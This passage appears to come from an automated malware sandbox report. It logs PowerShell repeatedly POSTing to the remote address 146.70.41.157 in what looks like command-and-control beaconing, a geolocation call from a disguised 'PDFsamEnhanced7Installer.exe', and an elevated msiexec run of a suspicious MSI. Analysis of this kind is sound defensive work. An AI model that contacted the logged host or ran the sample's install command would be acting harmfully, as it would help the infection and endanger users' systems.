                                                                                                    Content-Length: 120
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:37.236159086 CEST  2740  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 631
                                                                                                    Oct 4, 2021 21:29:37.965529919 CEST  2741  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 224
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:38.079246044 CEST  2741  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 284
                                                                                                    Oct 4, 2021 21:29:38.810697079 CEST  2742  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 91
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:38.923115969 CEST  2742  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 404
                                                                                                    Oct 4, 2021 21:29:39.674603939 CEST  2743  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 316
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:39.782951117 CEST  2743  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 611
                                                                                                    Oct 4, 2021 21:29:40.520941973 CEST  2744  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 181
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:40.657888889 CEST  2744  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 639
                                                                                                    Oct 4, 2021 21:29:41.406827927 CEST  2746  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 203
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:41.517119884 CEST  2746  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 301
                                                                                                    Oct 4, 2021 21:29:42.293865919 CEST  2747  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 253
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:42.407768965 CEST  2747  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 728
                                                                                                    Oct 4, 2021 21:29:43.148497105 CEST  2749  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 137
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:43.267075062 CEST  2749  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 561
                                                                                                    Oct 4, 2021 21:29:44.045028925 CEST  2751  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 258
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:44.158236980 CEST  2751  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 259
                                                                                                    Oct 4, 2021 21:29:44.925138950 CEST  2753  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 286
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:45.033004045 CEST  2753  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 325
                                                                                                    Oct 4, 2021 21:29:45.783480883 CEST  2755  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 235
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:45.892529964 CEST  2755  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 423
                                                                                                    Oct 4, 2021 21:29:46.643233061 CEST  2757  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 189
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:46.752700090 CEST  2757  OUT  POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 271
                                                                                                    Oct 4, 2021 21:29:47.521063089 CEST  2759  IN  HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 154
                                                                                                    Connection: keep-alive
Oct 4, 2021 21:29:47.627216101 CEST 2759 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 505
Oct 4, 2021 21:29:48.419296026 CEST 2761 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 214
Connection: keep-alive
Oct 4, 2021 21:29:48.533869982 CEST 2761 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 513
Oct 4, 2021 21:29:49.297333956 CEST 2764 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 192
Connection: keep-alive
Oct 4, 2021 21:29:49.424508095 CEST 2764 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 445
Oct 4, 2021 21:29:50.178056955 CEST 2766 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 211
Connection: keep-alive
Oct 4, 2021 21:29:50.284090042 CEST 2766 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 719
Oct 4, 2021 21:29:51.058393002 CEST 2769 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 314
Connection: keep-alive
Oct 4, 2021 21:29:51.174216986 CEST 2769 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 425
Oct 4, 2021 21:29:51.938174009 CEST 2771 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 242
Connection: keep-alive
Oct 4, 2021 21:29:52.049920082 CEST 2771 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 470
Oct 4, 2021 21:29:52.792300940 CEST 2773 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 252
Connection: keep-alive
Oct 4, 2021 21:29:52.909032106 CEST 2773 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 632
Oct 4, 2021 21:29:53.627832890 CEST 2775 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 111
Connection: keep-alive
Oct 4, 2021 21:29:53.736982107 CEST 2776 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 706
Oct 4, 2021 21:29:54.504793882 CEST 2778 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 115
Connection: keep-alive
Oct 4, 2021 21:29:54.627602100 CEST 2778 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 514
Oct 4, 2021 21:29:55.396528959 CEST 2780 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: keep-alive
Oct 4, 2021 21:29:55.504273891 CEST 2780 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 322
Oct 4, 2021 21:29:56.262039900 CEST 2782 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 108
Connection: keep-alive
Oct 4, 2021 21:29:56.377737999 CEST 2783 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 310
Oct 4, 2021 21:29:57.132621050 CEST 2784 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 232
Connection: keep-alive
Oct 4, 2021 21:29:57.237072945 CEST 2785 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 528
Oct 4, 2021 21:29:57.995834112 CEST 2787 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 305
Connection: keep-alive
Oct 4, 2021 21:29:58.112252951 CEST 2788 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 453
Oct 4, 2021 21:29:58.875210047 CEST 2789 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 130
Connection: keep-alive
Oct 4, 2021 21:29:58.987317085 CEST 2790 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 678
Oct 4, 2021 21:29:59.767409086 CEST 2792 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 108
Connection: keep-alive
Oct 4, 2021 21:29:59.878113985 CEST 2792 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 260
Oct 4, 2021 21:30:00.643884897 CEST 2794 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 215
Connection: keep-alive
Oct 4, 2021 21:30:00.753004074 CEST 2794 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 350
Oct 4, 2021 21:30:01.518286943 CEST 2796 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 104
Connection: keep-alive
Oct 4, 2021 21:30:01.628385067 CEST 2796 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 672
Oct 4, 2021 21:30:02.457025051 CEST 2798 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 218
Connection: keep-alive
Oct 4, 2021 21:30:02.565619946 CEST 2799 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 712
Oct 4, 2021 21:30:03.356282949 CEST 2801 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 168
Connection: keep-alive
Oct 4, 2021 21:30:03.471915007 CEST  2801  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 274
Oct 4, 2021 21:30:04.227562904 CEST  2803  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 150
    Connection: keep-alive
Oct 4, 2021 21:30:04.331509113 CEST  2803  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 581
Oct 4, 2021 21:30:05.085290909 CEST  2805  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 92
    Connection: keep-alive
Oct 4, 2021 21:30:05.190942049 CEST  2805  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 335
Oct 4, 2021 21:30:05.913774014 CEST  2807  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 172
    Connection: keep-alive
Oct 4, 2021 21:30:06.019232035 CEST  2807  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 247
Oct 4, 2021 21:30:06.736284018 CEST  2808  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 258
    Connection: keep-alive
Oct 4, 2021 21:30:06.847234011 CEST  2809  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 561
Oct 4, 2021 21:30:07.605823994 CEST  2810  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 103
    Connection: keep-alive
Oct 4, 2021 21:30:07.723180056 CEST  2811  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 581
Oct 4, 2021 21:30:08.465408087 CEST  2813  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 294
    Connection: keep-alive
Oct 4, 2021 21:30:08.582012892 CEST  2813  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 479
Oct 4, 2021 21:30:09.374495983 CEST  2815  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 201
    Connection: keep-alive
Oct 4, 2021 21:30:09.488132000 CEST  2816  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 522
Oct 4, 2021 21:30:10.267956018 CEST  2818  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 113
    Connection: keep-alive
Oct 4, 2021 21:30:10.379137993 CEST  2818  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 711
Oct 4, 2021 21:30:11.167277098 CEST  2820  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 283
    Connection: keep-alive
Oct 4, 2021 21:30:11.285759926 CEST  2820  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 531
Oct 4, 2021 21:30:12.072438002 CEST  2823  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 213
    Connection: keep-alive
Oct 4, 2021 21:30:12.176701069 CEST  2823  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 273
Oct 4, 2021 21:30:12.941164017 CEST  2825  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 295
    Connection: keep-alive
Oct 4, 2021 21:30:43.772115946 CEST  2826  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 461
Oct 4, 2021 21:30:44.559027910 CEST  2827  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 290
    Connection: keep-alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.4  49828        146.70.41.157   80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp  kBytes transferred  Direction  Data
Oct 4, 2021 21:29:42.560785055 CEST  2748  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 395
    Connection: Keep-Alive
Oct 4, 2021 21:29:43.475663900 CEST  2750  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 275
    Connection: keep-alive
Oct 4, 2021 21:29:43.577924967 CEST  2750  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 363
Oct 4, 2021 21:29:44.371078014 CEST  2752  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 335
    Connection: keep-alive
Oct 4, 2021 21:29:45.116631031 CEST  2753  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 615
Oct 4, 2021 21:29:45.861023903 CEST  2755  IN   HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 243
    Connection: keep-alive
Oct 4, 2021 21:29:46.019980907 CEST  2755  OUT  POST / HTTP/1.1
    Host: 146.70.41.157
    Content-Length: 516
Oct 4, 2021 21:29:46.796282053 CEST 2757 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 280
Connection: keep-alive
Oct 4, 2021 21:29:46.908816099 CEST 2758 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 471
Oct 4, 2021 21:29:47.675327063 CEST 2759 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 262
Connection: keep-alive
Oct 4, 2021 21:29:47.783431053 CEST 2760 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 427
Oct 4, 2021 21:29:48.543337107 CEST 2762 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 220
Connection: keep-alive
Oct 4, 2021 21:29:48.935764074 CEST 2763 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 601
Oct 4, 2021 21:29:49.657401085 CEST 2765 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 210
Connection: keep-alive
Oct 4, 2021 21:29:49.767855883 CEST 2765 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 719
Oct 4, 2021 21:29:50.524455070 CEST 2767 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 204
Connection: keep-alive
Oct 4, 2021 21:29:50.642749071 CEST 2768 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 364
Oct 4, 2021 21:29:51.402406931 CEST 2770 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 173
Connection: keep-alive
Oct 4, 2021 21:29:51.527610064 CEST 2770 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 343
Oct 4, 2021 21:29:52.333029985 CEST 2772 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 330
Connection: keep-alive
Oct 4, 2021 21:29:52.439862967 CEST 2772 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 745
Oct 4, 2021 21:29:53.193428993 CEST 2774 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 137
Connection: keep-alive
Oct 4, 2021 21:29:53.299407005 CEST 2775 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 555
Oct 4, 2021 21:29:54.075418949 CEST 2777 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 315
Connection: keep-alive
Oct 4, 2021 21:29:54.189908981 CEST 2777 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 495
Oct 4, 2021 21:29:54.931194067 CEST 2779 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 82
Connection: keep-alive
Oct 4, 2021 21:29:55.033898115 CEST 2779 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 326
Oct 4, 2021 21:29:55.775495052 CEST 2781 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 273
Connection: keep-alive
Oct 4, 2021 21:29:56.138819933 CEST 2782 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 545
Oct 4, 2021 21:29:56.919857025 CEST 2784 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 303
Connection: keep-alive
Oct 4, 2021 21:29:57.060986042 CEST 2784 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 504
Oct 4, 2021 21:29:57.819812059 CEST 2786 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 320
Connection: keep-alive
Oct 4, 2021 21:29:57.924762964 CEST 2786 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 634
Oct 4, 2021 21:29:58.707637072 CEST 2789 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 93
Connection: keep-alive
Oct 4, 2021 21:29:58.815407991 CEST 2789 OUT POST / HTTP/1.1
Host: 146.70.41.157
Content-Length: 694
Oct 4, 2021 21:29:59.537951946 CEST 2792 IN HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 262
Connection: keep-alive
                                                                                                    Oct 4, 2021 21:29:59.659332991 CEST | 2792 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 318
                                                                                                    Oct 4, 2021 21:30:00.408020973 CEST | 2793 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 181
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:00.615649939 CEST | 2794 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 278
                                                                                                    Oct 4, 2021 21:30:01.379547119 CEST | 2795 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 246
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:01.487452030 CEST | 2796 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 393
                                                                                                    Oct 4, 2021 21:30:02.249147892 CEST | 2798 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 304
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:02.364272118 CEST | 2798 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 360
                                                                                                    Oct 4, 2021 21:30:03.162836075 CEST | 2800 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 241
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:03.268831015 CEST | 2800 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 277
                                                                                                    Oct 4, 2021 21:30:03.999563932 CEST | 2802 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 210
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:04.112703085 CEST | 2802 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 429
                                                                                                    Oct 4, 2021 21:30:04.880990982 CEST | 2804 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 279
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:04.987998009 CEST | 2805 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 272
                                                                                                    Oct 4, 2021 21:30:05.749222040 CEST | 2806 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 118
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:05.862673044 CEST | 2806 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 385
                                                                                                    Oct 4, 2021 21:30:06.603471994 CEST | 2808 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 92
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:07.055438042 CEST | 2809 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 569
                                                                                                    Oct 4, 2021 21:30:07.840841055 CEST | 2811 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 284
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:07.956737041 CEST | 2812 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 521
                                                                                                    Oct 4, 2021 21:30:08.702217102 CEST | 2813 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 163
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:08.816289902 CEST | 2814 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 668
                                                                                                    Oct 4, 2021 21:30:09.605701923 CEST | 2816 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 235
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:09.722656012 CEST | 2817 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 410
                                                                                                    Oct 4, 2021 21:30:10.501885891 CEST | 2818 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 279
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:10.623146057 CEST | 2819 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 645
                                                                                                    Oct 4, 2021 21:30:11.375560999 CEST | 2821 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 207
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:11.489234924 CEST | 2822 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 674
                                                                                                    Oct 4, 2021 21:30:12.253351927 CEST | 2823 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 327
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:12.364031076 CEST | 2824 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 623
                                                                                                    Oct 4, 2021 21:30:13.173711061 CEST | 2826 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 106
                                                                                                    Connection: keep-alive
                                                                                                    Oct 4, 2021 21:30:51.147770882 CEST | 2827 | OUT | POST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 403
                                                                                                    Oct 4, 2021 21:30:51.905977964 CEST | 2828 | IN | HTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 125
                                                                                                    Connection: keep-alive


                                                                                                    HTTPS Proxied Packets

                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    0 | 192.168.2.4 | 49785 | 64.15.159.234 | 443 | C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    2021-10-04 19:28:36 UTC | 0 | OUT | POST /ipservice.asmx HTTP/1.1
                                                                                                    Accept: text/*
                                                                                                    SOAPAction: "http://upclick.com/GetLocationInfo"
                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                    User-Agent: VCSoapClient
                                                                                                    Host: wsgeoip.pdfsam.org
                                                                                                    Content-Length: 346
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Timestamp:2021-10-04 19:28:36 UTC
                                                                                                    kBytes transferred:0
                                                                                                    Direction:OUT
                                                                                                    Data Ascii: <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><GetLocationInfo
                                                                                                    Timestamp:2021-10-04 19:28:36 UTC
                                                                                                    kBytes transferred:0
                                                                                                    Direction:IN
                                                                                                    Data:
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                    X-AspNet-Version: 2.0.50727
                                                                                                    X-Powered-By: ASP.NET
                                                                                                    Date: Mon, 04 Oct 2021 19:28:34 GMT
                                                                                                    Connection: close
                                                                                                    Content-Length: 576
                                                                                                    Timestamp:2021-10-04 19:28:36 UTC
                                                                                                    kBytes transferred:0
                                                                                                    Direction:IN
                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><GetLocationInfoResponse xmlns="http:


                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Start time:21:28:07
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Nyship-Empire-Plan-Gym-Membership.msi'
                                                                                                    Imagebase:0x7ff777c90000
                                                                                                    File size:66048 bytes
                                                                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:21:28:08
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                    Imagebase:0x7ff777c90000
                                                                                                    File size:66048 bytes
                                                                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:21:28:09
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\MsiExec.exe -Embedding B7C7A506E4E2E0AFFC1F9F29629DA729 C
                                                                                                    Imagebase:0x7ff777c90000
                                                                                                    File size:66048 bytes
                                                                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:21:28:10
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 9EA879A27423DE072DACED38067EC0CA
                                                                                                    Imagebase:0x10000
                                                                                                    File size:59904 bytes
                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:21:28:11
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\msiexec.exe
